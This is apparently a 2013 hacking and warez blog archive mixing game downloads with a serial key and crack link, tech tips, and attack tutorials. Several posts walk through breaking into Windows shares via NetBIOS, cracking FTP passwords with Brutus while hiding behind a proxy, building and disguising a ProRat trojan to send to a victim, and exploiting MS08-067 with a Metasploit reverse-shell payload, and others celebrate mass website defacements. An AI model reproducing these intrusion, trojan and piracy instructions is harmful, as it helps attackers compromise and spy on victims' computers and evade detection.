King OF Games: May 2013

Wednesday, 29 May 2013

Transformers: War for Cybertron

Transformers: War for Cybertron

Developer: High Moon Studios
Publisher: Activision
Genre: Shooter
Release Date: June 22, 2010 (US)

About Transformers: War for Cybertron

Transformers: War for Cybertron challenges players to become the ultimate weapon as a Transformers character in the final, epic war that will determine the survival of their entire race. Armed with a diverse arsenal of lethal, high-tech weaponry and the ability to instantly convert from robot to vehicle at any time, players will engage in heart-pounding battles on land and in the air in this gripping, 3rd person action shooter set in the Transformers' war-ravaged homeland.

System Requirements

OS: Windows XP, Vista or Windows 7
CPU: Intel Core 2 Duo E4300 at 1.8 GHz / AMD Athlon 64 x2 Dual Core 4000
RAM: 2 GB
HDD: 9 GB free disk space
Graphics: 256 MB Graphics Memory
Sound Card: DirectX 9 Compatible
DirectX: Version 9.0c

Download Transformers: War for Cybertron – Direct Links

Serial:

D5TA-WL3C-6QQJ-W77A-A6C5

Truecaller hack How to Unlist Your Number from TrueCaller

TrueCaller is a mobile app and online service that serves as a very large phonebook for reverse phone number lookups. It’s helping you let know the names of unknown callers.

How does it work?
TrueCaller claims to source the caller information present in their database partly from public directories, and partly from “crowdsourced” data.

It looks like they scan and upload the entire phonebook to their servers. So if you install their app, it will make a note of all your contacts and upload them to the server.

Removing your Number

1. Goto http://www.truecaller.com/unlist/
2. Choose your country and enter the phone number in the relevant fields
3. Type the captcha
4. Press “Unlist”

Then they say the number was unlisted permanently and it takes 24 hours for the changes to happen.

Saturday, 25 May 2013

Types of Attacks on Web Servers

Some of the more popular attack methods are described below.

FTP Bounce Attack

FTP (File Transfer Protocol) is used to transfer documents and data anonymously from local machine to the server and vice versa. All administrators of FTP servers should understand how this attack works. The FTP bounce attack is used to slip past application-based firewalls.

In a bounce attack, the hacker uploads a file to the FTP server and then requests this file be sent to an internal server. The file can contain malicious software or a simple script that occupies the internal server and uses up all the memory and CPU resources.

To avoid these attacks, the FTP daemon on the Web servers should be updated regularly. The site FTP should me monitored regularly to check whether any unknown file is transferred to the Web server. Firewalls also help by filtering content and commands. Some firewalls block certain file extensions, a technique that can help block the upload of malicious software.

Port Scanning Attack

A port scan is when someone is using software tosystematically scan the entry points on other person’s machine. There arelegitimate uses for this software in managing a network.

Mosthackers enter another’s computer to leave unidentifiable harassing messages,capture passwords or change the set-up configuration. The defense for this isthrough, consistent network monitoring. There are free tools that monitor forport scans and related activity.

Ping Flooding Attack

Pinging involves one computer sending a signal to anothercomputer expecting a response back. Responsible use of pinging providesinformation on the availability of a particular service. Ping Flooding is theextreme of sending thousands or millions of pings per second. Ping Flooding cancripple a system or even shut down an entire site.

APing Flooding Attack floods the victim’s network or machine with IP Pingpackets. At least 18 operating systems are vulnerable to this attack, but themajority can be patched. There are also numerous routers and printers that arevulnerable. Patches cannot currently be applied throughout a global networkeasily.

Smurf Attack

A Smurf Attack is modification of the "ping attack"and instead of sending pings directly to the attacked system, they are sent to abroadcast address with the victim’s return address. A range of IP addressesfrom the intermediate system will send pings to the victim, bombarding thevictim machine or system with hundreds or thousands of pings.

One solution is to prevent the Web server from being usedas a broadcast. Routers must be configured to deny IP-Directed broadcasts fromother networks into the network. Another helpful measure is to configure therouter to block IP spoofing from the network to be saved. Routers configured assuch will block any packets that donor originate in the Network.To be effective this must be done to all routers on the network.

SYN Flooding Attack

This attack exploits vulnerability in the TCP/IPcommunications protocol. This attack keeps the victim machine responding back toa non-existent system. The victim is sent packets and asked to response to asystem or machine with an incorrect IP address. As it responds, it is floodedwith the requests. The requests wait for a response until the packets begin totime out and are dropped. During the waiting period, the victim system isconsumed by the request and cannot respond to legitimate requests.

When a normal TCP connection starts, a destination hostreceives a SYN (synchronize/start) packet from a source host and sends back aSYN ACK (synchronize acknowledge) response. The destination host must the hearan acknowledgement, or ACK packet, of the SYN ACK before the connection isestablished. This is referred as the "TCP three-way handshake”.

Decreasingthe time-out waiting period for the three way handshake can help to reduce therisk of SYN flooding attacks, as will increasing the size of the connectionqueue (the SYN ACK queue). Applying service packs to upgrade older operatingsystems is also a good countermeasure. More recent operating systems areresistant to these attacks.

IPFragmentation/Overlapping Fragment Attack

To facilitate IP transmission over comparatively congestednetworks. IP packets can be reduced in size or broken into smaller packets. Bymaking the packets very small, routers and intrusion detection systems cannotidentify the packets contents and will let them pass through without anyexamination. When a packet is reassembled at the other end, it overflows thebuffer. The machine will hang, reboot or may exhibit no effect at all.

Inan Overlapping Fragment Attack, the reassembled packet starts in the middle ofanother packet. As the operating system receives these invalid packets, itallocates memory to hold them. This eventually uses all the memory resources andcauses the machine to reboot or hang.

IPSequence Prediction Attack

Usingthe SYN Flood method, a hacker can establish connection with a victim machineand obtain the IP packet sequence number in an IP Sequence Prediction Attack.With this number, the hacker can control the victim machine and fool it intobelieving it’s communicating with another network machines. The victim machinewill provide requested services. Most operating systems now randomize theirsequence numbers to reduce the possibility of prediction.

DNSCache Poisoning

DNS provides distributed host information used for mappingdomain names and IP addresses. To improve productivity, the DNS server cachesthe most recent data for quick retrieval. This cache can be attacked and theinformation spoofed to redirect a network connection or block access to the Web sites),a devious tactic called DNS cache poisoning.

The best defense against problems such as DNS cachepoisoning is to run the latest version of the DNS software for the operatingsystem in use. New versions track pending and serialize them to help preventspoofing.

SNMP Attack

Most network devices support SNMP because it is active bydefault. An SNMP Attack can result in the network being mapped, and traffic canbe monitored and redirected.

The best defense against this attack is upgrading toSNMP3, which encrypts passwords and messages. SinceSNMP resides on almost all network devices, routers, hubs, switches, Servers andprinters, the task of upgrading is huge. Some vendors now offer an SNMP Managementtool that includes upgrade distribution for global networks.

UDP Flood Attack

AUDP Flood Attacks links two unsuspecting systems. By Spoofing, the UDP floodhooks up one system’s UDP service (which for testing purposes generates aseries of characters for each packet it receives) with another system’s UDPecho service (which echoes any character it receives in an attempt to testnetwork programs). As a result a non-stop flood of useless data passes betweentwo systems.

Send Mail Attack

In this attack, hundreds of thousands ofmessages are sent in a short period of time; a normal load might only be 100 or1000 messages per hour. Attacks against Send Mail might not make the front page,but downtime on major websites will.

For companies whose reputation dependson the reliability and accuracy of their Web-Based transactions, a DoS attackcan be a major embarrassment and a serious threat to business.

Conclusion

Frequent denial-of-service attacks and achange in strategy by "Black-Hat Hackers" are prompting enterprises todemand technology that proactively blocks malicious traffic.

Tools and services that reflectapproaches to combat such DoS attacks have been introduced with time. These arenormally upgrades to what was produced before. No solution is ever said to be anultimate solution to defend DoS attacks. Despite the new technology coming everyday, the attacks are likely to continue.

List of Free VPN Service Providers

Why You Need VPN ?

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet Surfing
Full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites
Unlike a proxy, you get secured connection for all programs you are using
Quality Network ensures your VPN service will be fast wherever you are in the world
Protection against your ISP
Bypass ISP Blocking for VOIP Applications like Skype

1. UltraVPN

It is a free VPN client/server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure.

You need to download nad install the client and create a (username, password) to use this service.

2. AloneWeb

AloneWeb is a completely free VPN service thru which you can access your favorite sites which are blocked by system admin or someone. If you use Internet in unsecured Wi-Fi area, then you can use these VPN services to hide your IP address and access sites securely. This is a free of charge service which is also reliable.

3. FreeVPN

With FreeVPN, you can access Sites from USA, UK, Canada, Germany, Italy, Sweden, France, China without any issue. Access blocked sites like hulu.com, pandora.com, ABC.com, BB.co.uk and much more even when you are in other country. Blocked sites are accessible without any problem.

4. CyberGhost

CyberGhost offers 1 GB per month free access of Internet, even for blocked sites. You can try CyberGhost because 1 GB is also good amount of traffic space. You can upgrade to premium version which stats from 14.26 USD.

5. Hotspot

Hotspot Shield is a free VPN service which can be used for accessing Internet even by hiding your own IP address. It is available for PC (Windows XP, Vista, Windows 7) as well as Mac. For anonymous use of Internet, you can use Hotspot Shield VPN service.

6. JAP aka JonDo

Jap is a research project which offers free VPN service. You can use this service to connect thru Internet and access your favorite sites. The service is not much reliable but you can use this one in case other doesn’t work.

7. GPass

Another great yet free VPN service. GPass is a really cool VPN where you can stream audio/video, email, instant messaging line Window messenger etc without any problem. Even you can use Download Manager to download stuffs from your favorite place.

8. LogMeIn Hamachi

LogMeIn is a well known remote desktop support provider. They also offer free VPN service under Hamachi name thru which you can access blocked sites from your office area or blocked area. Use this VPN service in Wi-Fi area to access sites securely.

9. Its Hidden

Another free VPN service provider. You don’t need any software to install. Use the secured connection on Its Hidden to access your favorite sites without any issue. They offer

10. Packetix.NET

This VPN technology is developed by SoftEther Corporation. You can use this test server for free access of your favorite sites and blocked sites in different geographic locations. You can access Internet from Unsecured locations like Wi-Fi enabled Hotels, Airports and even on untrustworthy ISPs.

11. HideipVPN

It is a free VPN service for US / UK sites. You can stat browsing anonymously by using this free service. HideipVPN offers limited number of free accounts every month. Currently they are offering 100 free accounts every month starting from 1’st of each month at 10:00AM GMT+2. So get ready to have a free account on 1‘st of this month.
Do you use VPN clients for Internet access or accessing your favorite sites blocked on certain locations? Share your favorite free VPN service which you use frequently.

12. Your Freedoom

This one is basically not a VPN service but its performs almost the same function with great ease, hence i included this in this list.

It provides both a free and paid service. Free service limits to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.

13. Loki Network Project

Loki Network Project is free VPN service and SSL based free VPN server. It is an opportunity to protect your private data (IP address, e-mail/FTP/HTTP passwords, web-sites visited, uploaded/downloaded files and etc…) and bypass certain Internet access limitations you may have at your location.

You need to download and install its free VPN Client software to create your own security schema.

14. ACEVPN

Ace VPN allows you to privately and securely surf and download on the internet without leaving a trace and/or being tracked. Ace VPN is the lowest cost VPN service provider allowing access to the gateway servers in multiple locations at no extra cost.

15. SecurityKiss

SecurityKiss is a tunnel service which ensures security and privacy once your data leaves your computer. It redirects all your traffic through an impenetrable tunnel to our security gateway. Everything in the tunnel is encrypted.

16. USA IP

For free user, you don’t need to register, just download the USAIP.pbk file, and then double-click on the file and select one of the USAIP PPTP connections. After that, you can access the USA IP free VPN services with the username demo and the password demo. But you will need to reconnect the USA IP network after every 7 minutes.

17. MacroVPN

A new player in the VPN field. MacroVPN does provide a Free VPN service, but it is more like an extended trial. There is a limit of 2GB traffic and 256kbps speed.
Do you know any other Free VPN service? Do share it by commenting below. If you see that any of the above services is down or closed, do let us know.

18. FREEDUR

19. LINKIDEO

Just a word of caution for everyone here. The free VPN services may not be as good as the paid ones. You may experience slow speed, downtimes etc. But its all like, you dont need them everytime. Just check them out and leave your feedback here. I would love to hear from you.

How to Compress your videos 50% without losing quality

many people ask me to compress their video so here is what you need

Most of the time when we compress any video file we loos the quality of video.

Today i am going to show how easily you can compress videos 50% without losing quality.

Download and Install Handbrake software.

Select your Source videos and choose the output destination folder. and click on the start

How to See if Your Hard Drive is Dying

Hard drives use S.M.A.R.T. (Self-Monitoring, Analysis, and Reporting Technology) to gauge their own reliability and determine if they’re failing. You can view your hard drive’s S.M.A.R.T. data and see if it has started to develop problems.

Unfortunately, Windows doesn’t have an easy-to-use built-in tool that shows your hard disk’s S.M.A.R.T. data. We will need a third-party tool to view this information, though there is a way to check your S.M.A.R.T. status from the command prompt.

Mehtod 1 :- use HDDScan freeware utility, it will give you full report of your hard-disk status.

Download

Method 2 :- In the Command prompt (Run > cmd) type the following command

Wmic

"Diskdrive get status"

Free Network Inventory Software for IT Professional

Today my company management ask me to make network inventory of entire network. if i am going to collect all all computer information like how many computers are there in my network ? Which operating system is installed there ? processor , model information of all computers. it will take approx 7 days in my normal work hour.

Lots of paid software are available on the internet for this work like Solarwinds for network inventory.

Today i am going to show how easily you will get network inventory with Lan-Sweeper freeware version.

What is Network Inventory Management

Network Inventory Management tools allow an administrator to maintain up-to-date records about the number, type and status of devices on a network. Network Inventory Management software ranges from network discovery tools to network configuration management utilities. Network Inventory Management software automates routine tasks and allows an administrator to remotely manage large numbers of networked devices simultaneously.

Lansweeper will give you information like :-

· Software inventory
· Network inventory
· License compliance
· Compliance reporting
· Active directory integration
· Eventlog integration

Download and install Lansweeper on your network, it will ask your administrator credentials. and it will give you full report.

Get the complete Domain Report of any Website

If you want to Find out the information of Registered domain information of any site, Registered Owner name , Hosting company name , Domain creation date , Domain Expiration date, IP-address information & Raw domain information.

You will easily get all the information with DomainHostingView Tool

Suppose you want to get the full information of facebook.com, just enter the website name.

DOWNLOAD

Friday, 24 May 2013

NetBIOS hack in windows OS

NetBIOS stands for Network Basic Input Output System. It allows your LAN or WAN to share drives, folders, files and printers. Gaining access to a computer through NetBIOS is very simple and easy. The only thing required is for the target machine to have file and printer sharing enabled and to have port 139 open. Below I will show you an example of what a hacker would do to gain access to a Windows machine through NetBIOS.

1. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner . Download and install it. (you can use any software you want to but i recommended this)

2. Next the hacker would insert the IP range he would like to scan. If the hacker was connected to a WLAN (Wireless Local Area Network) he would scan the local computers like I have shown below.

3. Since the hacker’s goal is to gain access to a system through NetBIOS, which runs on port 139, he will choose to scan each found host for that port. Click the downward arrow on the right and check the Scan ports box. A popup will come up asking you if you would like to select a new port. Click YES.

4. Type in the port number 139 into the first box and click OK.

5. Click start. The program will begin scanning and when it’s complete a box with the results will come up.

6. As you can see 224 Ips were scanned. Out of those only one was alive and luckily it has port 139 open.

7. Open the Command Prompt by going to Start -> Run -> Type in cmd -> <ENTER> .

8. Now the hacker would run the “nbtstat –a TargetIPaddress” this will tell us if the target has file and printing enabled. Without it, this attack is not possible.

9. In the above image DAVIDS-MACHINE is the name of the target computer. If you look to the right of it you will see the number <20>. This means that file and printer sharing is enabled. If there was no <20> then you could not go any further and would have to find a new target.

10. Next the hacker would run the command “net view \\TargetIPaddress”. This command will display any shared drives, folders, files or printers. If nothing comes up, you won’t be able to gain access to anything since there is nothing being shared. In my case, I got the following:

11. In my example, I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk.

12. To gain access to my SharedDocs disk, the hacker would have to map out the drive onto his computer. If successful, the hacker will have all the contents of my drive on his computer.

13. To map out my drive onto his computer the hacker would use the command “net use G: \\TargetIPaddress\DriveName”. So in my case I would run the command “net use G:\\192.168.1.101\SharedDocs”. You can use any letter in place of G:\\. This just tells the computer what to name the drive on your computer.

14. What’s this? Looks like I already have a drive G. To avoid this problem, go to My Computer where it will show all of your current Drives. To fix this simply change the letter G to a nonexistent drive letter.

15. Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double clicking it brings up all of the targets documents

note: if you don't want to let this happen then protect your shared folder and dont share printer and other device

Hack Facebook Account (Intro of Tabnabbing)

Hack Facebook Account (Intro of Tabnabbing) What is tabnabbing Tabnabbing is a latest phishing attack which has come from words tab and nabbing where we takes the advantage of victims habbit of surfing in 2 or more different tabs. In this trick you just navigate to your normal looking site may be you reached there by google, yahoo,facebook or may be some other source watch this video

Monday, 13 May 2013

How to configure/use ProRat Trojan to hack someone's PC (Free download and instructions)

It can connect to the server more faster.
It has more features/functions to play with your victim's PC.
Easy to configure.

Lets start the Tutorial:

Download ProRat and extract anywhere in your PC.
Now run ProRat.exe and then click on Create- Create ProRat Server (342 Kbayt)

From the Notifications tab, in the first option "Use ProConnective Notification" type your IP address. (If you don't know your IP address, simply click on the red arrow and it will automatically fill your IP address).
Now in the second option "Use Mail Notifications" type your Email address where you want to receive notification when the server is installed on your victim's PC.

In the General Settings Tab, leave as it is but don't forget to remember the password. You will be required to enter the password at the time of connection.
Now come to the Bind with File tab. Mark the box "Bind server with a file" and then click on Select File. Now select any file you want to bind with the server.(Binding means combining two files into one)
You can also change the extension of the server if you want by going to the Server Extensions tab.
Now click on Server Icon tab and select an icon for the bind files. Choose the icon wisely. If your have bind the server with some program, then select the setup icon or if your have bind the server with an image file, than select an image icon.
Finally click on Create Server.

Now the server will be created in your current directory (the extracted folder). Send or give the server to your victim and once your victim runs the bind file in his PC, the server will be installed silently on your victim's PC. After the server is installed on your victim's PC, the server will send you an email on your given email ID to confirm you that it's been installed successfully on the victim's PC. After getting the email, run ProRat again, then click onProConnective and then click on Start to list the ProConnective connections. After then, a new window will open which will show you weather your victim is online on not.

Thursday, 9 May 2013

Hitman 4: Blood Money

Hitman: Blood Money

Developer: Io Interactive
Publisher: Eidos Interactive
Genre: Action
Release Date: May 30, 2006 (US)

About Hitman: Blood Money

The fourth in the chilling Hitman series featuring the cold-blooded killer Agent 47. Finding that members of his contract agency, The ICA, are now being quietly (and mortally) eliminated, Agent 47 suspects a larger organization is moving in. Fearing he may be the next target, he heads to America. His jobs now will pay in straight-up cash -- and how he spends the money will affect what weapons he has and what he does next. The developer added new gameplay systems, such as the concepts of notoriety and of blood money. The new Notoriety system means that anyone causing a bloodbath worthy of front page news is risking being recognised by civilians and guards in the future. Blood money lets players spend their earnings on fully customisable precision weapons and specialist equipment, or they can buy additional information upon the targets and location at hand, to aid a successful and professional hit.

Minimum System Requirements

OS: Windows 2000/XP
Processor: Pentium 4 @ 1.5 GHz
Memory: 512 Mb
Hard Drive: 5 Gb free
Video Memory: 128 Mb
Sound Card: DirectX Compatible
DirectX: 9.0c
Keyboard
Mouse
DVD Rom Drive

Download Hitman: Blood Money – Direct Links

Part 1 – 700 MB

Part 2 – 700 MB

Part 3 – 700 MB

Part 4 – 700 MB

Part 5 – 700 MB

Part 6 – 700 MB

Part 7 – 103 MB

CRACK

www.elj-games.blogspot.com

Google.sm San Marino Domain Hacked By MCA-CRB, Algerian Hacker

Google.sm hacked and defaced by MCA-CRB, Algerian Hackers. Technically Registrar server is hacked using SQL Injection and hackers change DNS information about sites. There is not any specific reason mention about this hack on deface page but this rise many questions for security experts that how much these hacker are getting powerful.

Deface Page Say's:

"T0TAL C0NTR0L

By MCA-CRB

Algerian Hacker

Not Panic

It's A New Generation 0f Hackers

Greets t0 => My Best Friend Mr-AdeL & i-Hmx & Kader11000 & SPouPouH & Pirou

And my little brother Dz-Black All Members Sec4... <=

To Be Continued .... Forza-Dz"

Hacked Site:

http://www.google.sm/

Mirror:

http://www.zone-h.org/mirror/id/19300905

DNS spoofing Attack Detail's:
DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain Name System (DNS) name server's cache database, causing the name server to return an incorrect IP address, diverting traffic to another computer (often the attacker's).
Every country have registrar server which return the IP of local huge sites like google, msn etc. If registrar sever is compromised then we can redirect all those domains to specific ip which make it believe that sites are hacked. Basically sites are functioning properly, only there ip is hacked to hacked ip.

intro to Dictionary Attacks

Dictionary Attacks

A dictionary attack is when a text file full of commonly used passwords, or a list of every word from the dictionary is used against a password database. Strong passwords usually aren’t vulnerable to this kind of attack. In the following example, I will use Brutus, a very common password cracker, to show a dictionary attack against an ftp server. Brutus is a Windows only program, but at the end of this chapter I will list a couple more password crackers, some of which are made for Mac, Windows, and Linux.
Dictionary Attacks

Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at http://www.hoobie.net/brutus/

1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .
2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.

3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.

4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.
5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/ .

8 .Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.

9.If you’re lucky, eventually it’ll get the right Username:Password combination. As you can see below, it got the correct combination of username – admin and password – password.

10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.

Tuesday, 7 May 2013

[Metasploit Tutorial] Hacking Windows XP using IP Addres

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS. If you don't believe me, then read the full article. video tut on this article soon...

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

VirtualBox
Backtrack 5
Target OS(XP)

Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5". Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim. For Eg., By sending link that will get the ip details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12". Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.

Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi". Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10". Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12". Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

notice remember this is only for educational purpose dont miss use it its dangerous for you and for other learn it enjoy it do it ethically :) have fun and yeha subscribe my channel www.youtube.com/way2hackintosh

32bit or 64 bit OS ? (explanation)

32bit or 64 bit OS ? (explanation) small and little explanation on which os is good to use and what is difference it make so this is video tutorial so enjoy and give feeds :D

Sunday, 5 May 2013

135+ Israel Websites Hacked & Defaced by CapoO_TunisiAnoO, Tunisia Defacer

CapoO_TunisiAnoO Hacked 135 plus Israel sites to protest against attacks on "Syria".

CapoO_TunisiAnoO hacker from "Falagua Team" is well respect for his amazing work and reputation for being the only hacker that attacks only Israeli websites in his support for Palestine continues his attacks. This hacker has hacked and defaced over 135+ Israeli websites in protest against the Zionist state of Israel’s treatment of the Palestinians and Syria peoples. CapoO_TunisiAnoO hack about 7k Israeli sites is his hacking carer and remain at top in hacking against Israeli. At press time, all of them still weren't restored.

Deface Page Say's:

"> Oop's anti_juif and Terrorism in all World

This Syria [Today]..

Where Are They Dlaim To Defend Humman Rights ?

Where Are They Fighting Terrorism ? .

CapoO_TunisiAnoO // falagua team"

Hacked Site List:

http://dntv.co.il/
http://lev-israel.com/index.htm
http://etude.co.il/index.htm
http://petroll.co.il/index.htm
http://g-2.co.il/index.htm
http://wac.co.il/index.htm
http://anise.co.il/index.htm
http://art24.co.il/index.htm
http://d-n.co.il/index.htm
http://microtest.co.il/index.htm
http://shony.co.il/index.htm
http://kwc.co.il/index.htm
http://itas.co.il/index.htm
http://medmore.co.il/index.htm
http://martal.co.il/index.htm
http://blanco.co.il/index.htm
http://ezragates.co.il/index.htm
http://openspace1.co.il/index.htm
http://print-e.co.il/index.htm
http://brandnet.co.il/index.htm
http://shaked.co.il/index.htm
http://cafgimel.co.il/index.htm
http://glazer-wood.co.il/index.htm
http://safsufa.co.il/index.htm
http://ula-gula.co.il/index.htm
http://safsufa.com/index.htm
http://artishuk.co.il/index.htm
http://liran2000.co.il/index.htm
http://coolpool.co.il/index.htm
http://imagecom.biz/index.htm
http://shony.co.il/index.htm
http://ceramicdepot.co.il/index.htm
http://angelomio.co.il/index.htm
http://couscousmaison.com/index.htm
http://alumoran.com/index.htm
http://imperialhotel.co.il/index.htm
http://samra-group.co.il/index.htm
http://all-up.co.il/index.htm
http://shanelgreen.com/index.htm
http://dolevltd.co.il/index.htm
http://motors-transformers.co.il/index.htm
http://tevazikim.co.il/index.htm
http://2828.co.il/index.htm
http://chandelier.co.il/index.htm
http://shr-group.com/index.htm
http://stoneageminerals.com/index.htm
http://chandelier-jewelry.com/index.htm
http://matash.com/index.htm
http://matash.co.il/index.htm
http://nyga.co.il/index.htm
http://shaulsasson.co.il/index.htm
http://gutmark.com/index.htm
http://www.imagecom.biz/index.htm
http://gk-law.co.il/index.htm
http://skl.co.il/index.htm
http://www.eitanprint.co.il/index.htm
http://smoker.co.il/index.htm
http://kerenmedical.com/index.htm
http://dsltrade.com/index.htm
http://azuri.co.il/index.htm
http://yoga-zchok.co.il/index.htm
http://ramigan.co.il/index.htm
http://d3d.co.il/index.htm
http://eitanprint.co.il/index.htm
http://harash-outlet.co.il/index.htm
http://giltours.co.il/index.htm
http://tamlil2100.co.il/index.htm
http://davik.co.il/index.htm
http:/g-2.co.il/index.htm
http://egoz-insu.co.il/index.htm
http://harel-k.co.il/index.htm
http://c-m.co.il/index.htm
http://d3d.co.il/index.htm
http://q-d.co.il/index.htm
http://matash.com/index.htm
http://stk.co.il/index.htm
http://shl.co.il/index.htm
http://www.scab.co.il/index.htm
http://yoga-zchok.co.il/index.htm
http://imos3d.co.il/index.htm
http://mamon.org.il/index.htm
http://yeminsaad.org/index.htm
http://graphpen.com/index.htm
http://stoneage.co.il/index.htm
http://weber.co.il/index.html
http://rde.co.il/index.htm
http://barbour.co.il/index.htm
http://bbq.co.il/index.htm
http://ida.org.il/index.htm
http://s-l.co.il/index.htm
http://sa-sa.co.il/index.htm
http://medilife.co.il/index.htm
http://www.imagecom.co.il/index.htm
http://angelomio.co.il/index.htm
http://bazbag.com/index.htm
http://bedektools.co.il/index.htm
http://belshop.co.il/index.htm
http://bezalel-office.co.il/index.htm
http://bonijer.co.il/index.htm
http://c-yam.co.il/index.htm
http://coffee-market.co.il/index.htm
http://cohen-sons.co.il/index.htm
http://dr-pola.com/index.htm
http://dorot.net/index.htm
http://el-ram.info/index.htm
http://funkydj.co.il/index.htm
http://feffer.co.il/index.htm
http://geron-center.co.il/
http://hapoel-holon.co.il/default.htm
http://golfgaash.co.il/index.htm
http://isradance.net/index.htm
http://kikarhacity.co.il/index.htm
http://kerenel.co.il/index.htm
http://mamtakim-ades.co.il/index.htm
http://ayelet-sport.org.il/index.htm
http://avidanwinery.com/index.htm
http://batim-betmuna.co.il/index.htm
http://lesicopp.com/default.htm
http://metzia.co.il/index.htm
http://lesico.co.il/index.htm
http://aclavtul.co.il/index.htm
http://ctr-pharma-ltd.com/index.htm
http://privatedeal.co.il/index.htm
http://avgad.co.il/index.htm
http://orel-wood.co.il/index.htm
http://nth-sense.com/index.htm
http://rat.co.il/index.htm
http://rei-ceramica.co.il/index.htm
http://school-market.co.il/index.htm
http://scdent.co.il/index.htm
http://shiran-hpl.co.il/index.htm
http://shipuzim.co/index.htm
http://schwarcztools.com/index.htm
http://tal-sport.co.il/default.htm
http://התאחדות-אילת.co.il/index.htm

Mirrors:
http://www.zone-h.com/archive/notifier=CapoO_TunisiAnoO

Saturday, 4 May 2013

What is Database?What is SQL injection?

In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.

What is the Database?
Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.

Database is a place that stores username,passwords and more details. Database should be secured. But providing high level security is not possible for all sites(much costlier or poor programming ). So Database of many websites is insecure or vulnerable(easily hackable).

Some List of Database are:

DB servers,
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite,

What is SQL injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

ByPassing Logins
Accessing secret data
Modifying contents of website
Shutting down the My SQL server

Introduction to Social Engineering world

What is Social Engineering?

Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.

"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker.

Some Examples
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

